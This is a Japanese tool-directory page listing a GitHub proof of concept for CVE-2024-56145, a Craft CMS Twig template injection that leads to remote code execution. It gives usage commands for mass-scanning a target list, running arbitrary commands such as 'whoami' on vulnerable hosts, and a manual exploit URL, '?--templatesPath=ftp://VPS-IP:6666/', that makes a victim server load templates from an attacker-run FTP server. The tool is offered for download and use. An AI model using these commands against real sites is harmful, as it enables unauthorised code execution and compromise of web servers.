Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI から RCE - twig テンプレート | Kitploit
ツール/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI から RCE - twig テンプレート

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
431年前未レビュー

スクリプトを再度実行する前に、次のコマンドを実行してください:

fuser -k 6666/tcp

使用方法 -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

カスタムコマンドも使用できます。例:python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i はあなたのIPまたはVPSのIPです(ipconfig / ifconfig で確認できます)。

例:python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

手動エクスプロイト:上記のpoc.pyを対象のターゲットに対して実行すると、脆弱なターゲットが含まれた出力ファイルが表示されます。

さて、脆弱なターゲットは見つかりましたが、さらに詳しく調べたいですか? そこで、poc2.pyを追加しました。これはターゲットに対する手動テスト用です。どのように使うのでしょうか?

まず fuser -k 6666/tcp を実行してください。

root@kitploit:~
1. poc2.py を実行します(ポート6666がFTPとして起動します)。
2. ブラウザで yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/ を開きます。
3. 以下のように表示されます -

image

作成者 Chirag Artani (https://x.com/Chirag99Artani)

ツールをダウンロード